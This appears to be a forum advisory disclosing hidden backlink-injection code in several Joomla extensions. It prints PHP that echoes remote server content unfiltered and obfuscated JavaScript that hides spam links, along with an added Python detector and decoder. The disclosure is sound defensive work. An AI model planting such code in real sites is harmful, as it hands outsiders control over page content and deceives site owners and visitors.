The most popular vulnerable extensions are:
- Autson Skitter Slideshow (mod_AutsonSlideShow)
The malicious code is located in the "tmpl" folder, in the php file(s).
- Share This for Joomla! (mod_JoomlaShare This)
The malicious code is located in mod_JoomlaShare This.php.
- VirtueMart Advanced Search (mod_virtuemart_advsearch)
The malicious code is located in mod_virtuemart_advsearch.php.
- AddThis For Joomla (mod_AddThisForJoomla)
The malicious code is located in mod_AddThisForJoomla.php.
- Plimun Nivo Slider (mod_PlimunNivoSlider)
The malicious code is located in the "tmpl" folder, in the php file(s).
The hidden backlinks are being inserted via the following code:
<?php
// fetches whatever the remote server returns and prints it into the page unfiltered
$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);
echo $credit;
?>
OR
<?php
$credit=file_get_contents('http://www.autson.com/p.php?i='.$path);
echo $credit;
?>
etc. The file on their server that the code accesses has many different names, but the code will resemble the code above. The code is usually near the end of the PHP file.
This is what that code is inserting into the site:
<script language="JavaScript">
function dnnViewState()
{
// each two-digit pair in the x[] strings below is decoded into one character; the result is written out as a <style> rule for the "dnn" class that places the backlink paragraph off-screen
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787',
'949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
</script>
<p class="dnn">By PDPRELUK <a href="/http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
OR
<script language="JavaScript">
function nemoViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896',
'877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
</script><p class="nemonn">By PDPRELUK <a href="/http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
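Two defender-side checks for the injection quoted above, as an added example that is not code from the original post: a scan for the fetch-remote-URL-and-echo pattern in a module's PHP, and a decoder for the digit-pair scheme used by dnnViewState()/nemoViewState() so the hidden <style> rule can be read. The sample PHP file is constructed and its host name is a placeholder.

```python
# Added example, not from the original post: detection and decoding for the
# backlink injection described above. SAMPLE_PHP is constructed input.
import re

# Matches: $var = file_get_contents('http://host/path?i=' . $something);
FETCH_RE = re.compile(
    r"\$(\w+)\s*=\s*file_get_contents\(\s*['\"](https?://[^'\"]*)['\"]\s*\.", re.I)

def find_remote_echo(php_source: str) -> list:
    """Return (variable, url) pairs where the file fetches a remote URL into a
    variable and later echoes that variable into the page unfiltered."""
    hits = []
    for m in FETCH_RE.finditer(php_source):
        var, url = m.group(1), m.group(2)
        if re.search(r"\becho\s+\$" + re.escape(var) + r"\b", php_source):
            hits.append((var, url))
    return hits

def decode_digit_pairs(chunks: list) -> list:
    """Reverse the dnnViewState()/nemoViewState() encoding: walk the array from
    its end (a = 1..n) and turn each two-digit pair p into chr(p + 25 - n + a)."""
    n = len(chunks)
    out = [""] * n
    for a in range(1, n + 1):
        m = chunks[n - a]
        out[n - a] = "".join(chr(int(m[i:i + 2]) + 25 - n + a)
                             for i in range(0, len(m), 2))
    return out

def injected_css(chunks: list) -> str:
    """Rebuild the rule the script document.write()s into its <style> tag."""
    x = decode_digit_pairs(chunks)
    return "." + x[2] + "{" + x[1] + "}"

# Constructed sample module file mirroring the PHP quoted above (placeholder host).
SAMPLE_PHP = """<?php
$path = 'constructed-site-path';
$credit = file_get_contents('http://SPAM-HOST-PLACEHOLDER/p.php?i=' . $path);
echo $credit;
?>"""

# Digit strings copied from the first injected script quoted above.
DNN_CHUNKS = ['9091968376',
              '8887918192818786347374918784939277359287883421333333338896',
              '778787', '949990793917947998942577939317']

if __name__ == "__main__":
    print(find_remote_echo(SAMPLE_PHP))  # [('credit', 'http://SPAM-HOST-PLACEHOLDER/p.php?i=')]
    print(injected_css(DNN_CHUNKS))      # the rule that moves the .dnn paragraph off-screen
```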
Additional extensions from these developers that are possibly vulnerable as well:
iNowWeb.com (author: Sharif Mamdouh):
- iNowSlider (mod_iNowSlider)
- iNow Twitter Widget (mod_TwitterWidget)
- BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
- Quotes By keyWord! (mod_JoomlaQuotes)
- iNow Wikio (mod_JoomlaWikio)
- iNow Twitter (mod_TwitterForJoomla)
- QuickJump for Joomla! (mod_quickjump)
Autson.com (author: xing):
- FaceBook Slider
- Twitter Friends & Followers
- Flying Tweets
- Autson Twitter Search
- Twitter Quote
- FaceBook Show
Plimun.com:
- Plimun Twitter Ticker
- Twitter Show
I've managed to gather a list of around 20,000 vulnerable websites that have installed extensions from this developer and are displaying hidden backlinks that are inserted by the extensions. The list is by no means comprehensive, but I believe it has a large portion of the vulnerable websites. You can see the list here: http://pastebin.com/tWfiKcrr
So what can we do to stop these spammers/hackers?
1. Remove the extensions from your or your clients' websites (or just remove the malicious code (BEACON Says: NOT Recommended, see below for details)).
2. Do our best to reach out to the webmasters of the sites in the pastebin list above.
3. Report their domain names for spam/abuse to their registrar's abuse contact: they are all registered at Namecheap. The more people that complain, the more likely Namecheap will act. The domain names are: autson.com, inowweb.com, plimun.com
The actions of developers like this adversely affect the entire Joomla community and we must do something to stop it.
Additional Behaviour noticed with ShareThis for Joomla! :
The extension was used/evaluated for website(s) by Beacon Solutions, and some peculiar behaviour was noticed.
- The above-mentioned extension used to load insecure code. (We accidentally discovered it when we enabled sitewide SSL/HTTPS a few months ago.) When LinkedIn (and maybe other social options) was selected, a nasty browser warning (for loading insecure content) used to be thrown up. The issue was not investigated further (it was easier to find an alternative extension).
- Another aspect worth mentioning: the above-mentioned backlinks are not loaded in some configurations (but are definitely loaded when LinkedIn is selected), which suggests there may be more lines of code controlling the backlink behaviour.
- Please refrain from just fixing (unless you make a full code review); remove and find an alternative extension instead (and pray it's made by a good guy).